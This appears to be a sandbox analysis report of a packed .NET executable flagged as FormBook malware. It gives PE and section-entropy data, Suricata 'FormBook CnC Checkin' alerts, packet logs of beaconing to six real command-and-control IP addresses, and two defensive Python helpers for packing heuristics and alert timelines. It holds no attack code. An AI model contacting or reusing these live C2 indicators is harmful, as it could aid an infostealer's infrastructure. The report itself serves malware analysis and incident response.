SHA512: e57199219c8e6828f67a6c2c4167d6d44426571fa7efcff20b904af595fadea18ed42e12176e47a67d4ed26858198d0732b3d804407ef49728e833c22ae82da5
SSDEEP: 12288:00MPku+l0CPP/NLsIqFse6TU/L5d+gAk/YoYmw4VsXHC+MsM/VDp6556IgJoxKR:wPd+p/us4z5d+gdYoYbDS+MR9DvZ
TLSH: 7D15CFC0373AB711DE7CA670882AEDB823652E787000F9E66DDD27D7759C7126A18F06
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0.................. ... ....@.. .......................`............@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4e100a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67611FC5 [Tue Dec 17 06:52:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the zero bytes after the 6-byte stub, disassembled as 00 00)

The entry point (0x4e100a, RVA 0xe100a, the last six bytes of .text) is the standard 32-bit CLR launch stub: the jmp goes through the single IAT slot (IMAGE_DIRECTORY_ENTRY_IAT at RVA 0x2000, size 0x8, plus image base 0x400000) to mscoree!_CorExeMain, the sample's only native import. Nothing sample-specific lives in native code here; the behaviour is in the managed (IL) code that the CLR loads from the .text section.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe0fb6 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe2000 | 0x608 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xded2c | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xdf010 | 0xdf200 | b35c01be48f0a78a85d9ac359800958c | False | 0.8034970238095238 | data | 7.659098571397496 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe2000 | 0x608 | 0x800 | 431474aaa182e56f927621b7a837aff4 | False | 0.3359375 | data | 3.42174014633411 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe4000 | 0xc | 0x200 | a8f5d199a15aee7352f1c6d3a4a2d705 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Almost the whole file is the .text section, and its entropy (7.66 of a possible 8 bits) and ZLIB complexity (0.80) are far above what compiled IL normally shows; that is consistent with an encrypted or compressed payload embedded in the assembly rather than with plain code.
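The two per-section indicators in the table above, Entropy (8bit) and ZLIB Complexity, are cheap to recompute and make a usable packed-section heuristic. The following is an added example (not Joe Sandbox code). It assumes that ZLIB Complexity is the compressed-to-raw size ratio of the section bytes and that the thresholds 7.2 bits and 0.75 are reasonable cut-offs for an executable section; both are the author's assumptions. The sample sections it scores are constructed in the block, and it then applies the same heuristic to the report's own .text figures.

```python
"""Recompute the per-section packing indicators this report lists,
'Entropy (8bit)' and 'ZLIB Complexity', and apply a packed-section heuristic.
Added example, not Joe Sandbox code.  Assumption: ZLIB Complexity is
len(zlib.compress(section)) / len(section); the thresholds are the author's."""
import hashlib
import math
import zlib


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed-to-raw size ratio; about 1.0 for random or encrypted bytes."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def is_executable(characteristics: str) -> bool:
    """True when the IMAGE_SCN flags mark the section as code or executable."""
    flags = {f.strip() for f in characteristics.split(",")}
    return bool(flags & {"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE"})


def looks_packed(entropy: float, complexity: float, characteristics: str,
                 entropy_threshold: float = 7.2,
                 complexity_threshold: float = 0.75) -> bool:
    """Heuristic (thresholds assumed): an executable section whose bytes are
    both near-uniform and incompressible holds encrypted or compressed data,
    not plain code.  Compiled x86 or IL usually scores well below 7 bits."""
    return (is_executable(characteristics)
            and entropy >= entropy_threshold
            and complexity >= complexity_threshold)


def pseudo_random(n: int, seed: bytes = b"constructed sample") -> bytes:
    """Deterministic stand-in for an encrypted payload (SHA-256 chain)."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def assess_section(name: str, data: bytes, characteristics: str):
    """Return (name, entropy, complexity, packed?) for a section's bytes."""
    e, c = shannon_entropy(data), zlib_complexity(data)
    return name, round(e, 3), round(c, 3), looks_packed(e, c, characteristics)


# Constructed sections: a repetitive IL-like stub and an "encrypted" blob.
CODE_FLAGS = "IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ"
DATA_FLAGS = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"
IL_LIKE = bytes.fromhex("0028010000062a") * 4096   # repeated call/ret pattern
BLOB = pseudo_random(64 * 1024)

if __name__ == "__main__":
    for row in (assess_section(".text (IL-like)", IL_LIKE, CODE_FLAGS),
                assess_section(".text (blob)", BLOB, CODE_FLAGS),
                assess_section(".reloc", b"\x00" * 512, DATA_FLAGS)):
        print(row)
    # The report's own .text figures trip the same heuristic.
    print(looks_packed(7.659098571397496, 0.8034970238095238, CODE_FLAGS))
```

The two metrics are complementary: entropy alone is fooled by a section that is mostly zero padding with a small encrypted blob inside, while the zlib ratio drops as soon as any structure is present, so requiring both to be high keeps the false-positive rate down on ordinary code sections.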
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe2090 | 0x378 | data | | | 0.43243243243243246
RT_MANIFEST | 0xe2418 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T19:46:21.171227+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49843 | 172.247.112.164 | 80 | TCP
2025-01-10T19:46:49.387880+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50012 | 13.248.169.48 | 80 | TCP
2025-01-10T19:47:23.511477+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50016 | 156.253.8.115 | 80 | TCP
2025-01-10T19:47:36.864133+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50020 | 37.97.254.27 | 80 | TCP
2025-01-10T19:47:51.047350+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50024 | 199.193.6.134 | 80 | TCP
2025-01-10T19:48:18.386830+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50028 | 124.6.61.130 | 80 | TCP

All six alerts are the same ET rule (SID 2050745) firing on the plain-HTTP check-in GET, sent to six different servers on port 80 within about two minutes.
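Turning the Suricata alert table above and the TCP packet list that follows into a check-in timeline and a per-server connection count is the first thing a responder does with this kind of report. The block below is an added example, not Joe Sandbox code. Its input rows are the report's own values re-typed as pipe-separated text (the packet rows are an excerpt: the complete first flow, the start of the second, and the opening packets of two further connections to 13.248.169.48). It assumes the sandbox VM is the only host in 192.168.2.0/24, so that prefix identifies the client side of every flow, and it truncates the nanosecond packet timestamps to microseconds. FormBook beacons to a list of hosts that mixes live C2 with decoys, so treat the resulting IP list as one indicator set rather than six confirmed servers.

```python
"""Summarise the FormBook C2 check-ins recorded in this report's Suricata
alert table and TCP packet list.  Added example, not Joe Sandbox code; the
rows below are the report's own values re-typed as pipe-separated text, and
the packet list is an excerpt (first flow in full, later flows abridged)."""
import re
from collections import Counter
from datetime import datetime, timedelta

ALERTS = """\
2025-01-10T19:46:21.171227+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.4|49843|172.247.112.164|80|TCP
2025-01-10T19:46:49.387880+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.4|50012|13.248.169.48|80|TCP
2025-01-10T19:47:23.511477+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.4|50016|156.253.8.115|80|TCP
2025-01-10T19:47:36.864133+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.4|50020|37.97.254.27|80|TCP
2025-01-10T19:47:51.047350+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.4|50024|199.193.6.134|80|TCP
2025-01-10T19:48:18.386830+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.4|50028|124.6.61.130|80|TCP
"""

PACKETS = """\
Jan 10, 2025 19:46:20.591202974 CET|49843|80|192.168.2.4|172.247.112.164
Jan 10, 2025 19:46:20.596041918 CET|80|49843|172.247.112.164|192.168.2.4
Jan 10, 2025 19:46:20.596216917 CET|49843|80|192.168.2.4|172.247.112.164
Jan 10, 2025 19:46:20.606928110 CET|49843|80|192.168.2.4|172.247.112.164
Jan 10, 2025 19:46:20.611690998 CET|80|49843|172.247.112.164|192.168.2.4
Jan 10, 2025 19:46:21.127095938 CET|80|49843|172.247.112.164|192.168.2.4
Jan 10, 2025 19:46:21.171226978 CET|49843|80|192.168.2.4|172.247.112.164
Jan 10, 2025 19:46:21.175731897 CET|80|49843|172.247.112.164|192.168.2.4
Jan 10, 2025 19:46:21.177223921 CET|49843|80|192.168.2.4|172.247.112.164
Jan 10, 2025 19:46:21.178807974 CET|49843|80|192.168.2.4|172.247.112.164
Jan 10, 2025 19:46:21.184982061 CET|80|49843|172.247.112.164|192.168.2.4
Jan 10, 2025 19:46:41.267987967 CET|49970|80|192.168.2.4|13.248.169.48
Jan 10, 2025 19:46:41.272800922 CET|80|49970|13.248.169.48|192.168.2.4
Jan 10, 2025 19:46:41.272883892 CET|49970|80|192.168.2.4|13.248.169.48
Jan 10, 2025 19:46:41.286834002 CET|49970|80|192.168.2.4|13.248.169.48
Jan 10, 2025 19:46:41.291716099 CET|80|49970|13.248.169.48|192.168.2.4
Jan 10, 2025 19:46:43.815299988 CET|49987|80|192.168.2.4|13.248.169.48
Jan 10, 2025 19:46:43.820169926 CET|80|49987|13.248.169.48|192.168.2.4
Jan 10, 2025 19:46:46.362154007 CET|50003|80|192.168.2.4|13.248.169.48
Jan 10, 2025 19:46:46.367079973 CET|80|50003|13.248.169.48|192.168.2.4
"""

_PKT_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) CET$")


def parse_alerts(text):
    """One dict per Suricata alert row; timestamps become aware datetimes."""
    rows = []
    for line in text.splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
        rows.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                     "sid": int(sid), "sig": sig, "severity": int(sev),
                     "src": (sip, int(sport)), "dst": (dip, int(dport)),
                     "proto": proto})
    return rows


def parse_packets(text):
    """One dict per packet row; nanosecond stamps are cut to microseconds."""
    rows = []
    for line in text.splitlines():
        ts, sport, dport, sip, dip = line.split("|")
        m = _PKT_TS.match(ts)
        base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
        micros = int(m.group(2)[:6].ljust(6, "0"))
        rows.append({"ts": base + timedelta(microseconds=micros),
                     "src": (sip, int(sport)), "dst": (dip, int(dport))})
    return rows


def build_flows(packets, client_net="192.168.2."):
    """Group packets into flows keyed ((client ip, port), (server ip, port)),
    counting packets per direction; the sandbox VM (assumed) is the client."""
    flows = {}
    for p in packets:
        if p["src"][0].startswith(client_net):
            key, direction = (p["src"], p["dst"]), "out"
        else:
            key, direction = (p["dst"], p["src"]), "in"
        flow = flows.setdefault(key, {"out": 0, "in": 0, "first": p["ts"]})
        flow[direction] += 1
        flow["first"] = min(flow["first"], p["ts"])
    return flows


def checkin_timeline(alerts):
    """Seconds between consecutive check-in alerts, and the unique C2 IPs."""
    ordered = sorted(alerts, key=lambda a: a["ts"])
    gaps = [round((b["ts"] - a["ts"]).total_seconds(), 1)
            for a, b in zip(ordered, ordered[1:])]
    return gaps, sorted({a["dst"][0] for a in ordered})


def connections_per_server(flows):
    """Distinct client sockets per server IP: more than one means the sample
    reconnected before (or without) a request that fired the rule."""
    return dict(Counter(server_ip for (_, (server_ip, _)) in flows))


if __name__ == "__main__":
    gaps, iocs = checkin_timeline(parse_alerts(ALERTS))
    print("check-in gaps (s):", gaps, "C2 IPs:", iocs)
    flows = build_flows(parse_packets(PACKETS))
    for (c, s), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        print(f"{c[0]}:{c[1]} -> {s[0]}:{s[1]}  out={f['out']} in={f['in']}")
    print("connections per server:", connections_per_server(flows))
```

Grouping by server IP rather than by socket matters here: the excerpt shows three separate connections to 13.248.169.48 in five seconds, none of which is the port-50012 request that eventually raised the alert, so a per-flow view would under-count the beaconing.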
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 19:46:20.591202974 CET | 49843 | 80 | 192.168.2.4 | 172.247.112.164
Jan 10, 2025 19:46:20.596041918 CET | 80 | 49843 | 172.247.112.164 | 192.168.2.4
Jan 10, 2025 19:46:20.596216917 CET | 49843 | 80 | 192.168.2.4 | 172.247.112.164
Jan 10, 2025 19:46:20.606928110 CET | 49843 | 80 | 192.168.2.4 | 172.247.112.164
Jan 10, 2025 19:46:20.611690998 CET | 80 | 49843 | 172.247.112.164 | 192.168.2.4
Jan 10, 2025 19:46:21.127095938 CET | 80 | 49843 | 172.247.112.164 | 192.168.2.4
Jan 10, 2025 19:46:21.171226978 CET | 49843 | 80 | 192.168.2.4 | 172.247.112.164
Jan 10, 2025 19:46:21.175731897 CET | 80 | 49843 | 172.247.112.164 | 192.168.2.4
Jan 10, 2025 19:46:21.177223921 CET | 49843 | 80 | 192.168.2.4 | 172.247.112.164
Jan 10, 2025 19:46:21.178807974 CET | 49843 | 80 | 192.168.2.4 | 172.247.112.164
Jan 10, 2025 19:46:21.184982061 CET | 80 | 49843 | 172.247.112.164 | 192.168.2.4
Jan 10, 2025 19:46:41.267987967 CET | 49970 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:41.272800922 CET | 80 | 49970 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:41.272883892 CET | 49970 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:41.286834002 CET | 49970 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:41.291716099 CET | 80 | 49970 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:41.772420883 CET | 80 | 49970 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:41.772638083 CET | 80 | 49970 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:41.772689104 CET | 49970 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:42.796267033 CET | 49970 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:43.815299988 CET | 49987 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:43.820169926 CET | 80 | 49987 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:43.820244074 CET | 49987 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:43.835413933 CET | 49987 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:43.840234995 CET | 80 | 49987 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:45.343058109 CET | 49987 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:45.391143084 CET | 80 | 49987 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:46.362154007 CET | 50003 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:46.367079973 CET | 80 | 50003 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 19:46:46.367221117 CET | 50003 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:46.381752968 CET | 50003 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 19:46:46.386670113 CET | 80 | 50003 | 13.248.169.48 | 192.168.2.4

The first flow (port 49843) is the one that raised the 19:46:21 alert against 172.247.112.164. Against 13.248.169.48 the sample opens three short connections within five seconds (ports 49970, 49987 and 50003, each answered by the server); the connection on port 50012 that fired the rule at 19:46:49 is not among the rows shown here, so the beaconing to that host is only visible when flows are grouped by server IP rather than by socket.
                                                                                                                                    Jan 10, 2025 19:46:46.386682987 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386701107 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386709929 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386775017 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386784077 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386840105 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386850119 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386861086 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.859031916 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.860971928 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.861148119 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:47.211410046 CET804998713.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:47.211621046 CET4998780192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:47.889981031 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.909116030 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.914102077 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:48.914190054 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.924024105 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.928886890 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:49.387398958 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:49.387818098 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:49.387880087 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:49.390974045 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:49.395802021 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:54.448497057 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:54.453349113 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:54.453433990 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:54.468764067 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:54.473507881 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:55.983792067 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:56.036516905 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:57.002903938 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:57.007797003 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:57.007898092 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:57.022177935 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:57.026951075 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:58.530785084 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:58.579093933 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.549355030 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:59.554157019 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.554270029 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:59.568818092 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:59.573746920 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573760986 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573780060 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573788881 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573823929 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573844910 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573940039 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573950052 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573957920 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:01.077581882 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:01.123063087 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:02.096750021 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:02.101634026 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:02.101691008 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:02.111824036 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:02.116734028 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:15.860539913 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:15.860662937 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:18.387823105 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:18.387875080 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:20.969266891 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:20.969325066 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:23.511208057 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:23.511476994 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:23.512360096 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:23.517118931 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:28.562661886 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:28.567498922 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:28.567641020 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:28.590451956 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:28.595230103 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:29.200200081 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:29.200392962 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:29.200468063 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:30.093199015 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.112135887 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.116966963 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.117050886 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.132036924 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.136858940 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.713006973 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.713177919 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.713232040 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:32.640192986 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.658607006 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.663491964 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.663593054 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.679908991 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.684874058 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684905052 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684952021 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684973955 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684993982 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685014963 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685036898 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685090065 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685111046 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:34.298815966 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:34.298896074 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:34.298940897 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:35.187066078 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.242249012 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.247169971 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.247267962 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.298125982 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.302997112 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.863960981 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864012957 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864026070 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864044905 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864063025 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864075899 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864089966 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864101887 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864115000 CET805002037.97.254.27192.168.2.4
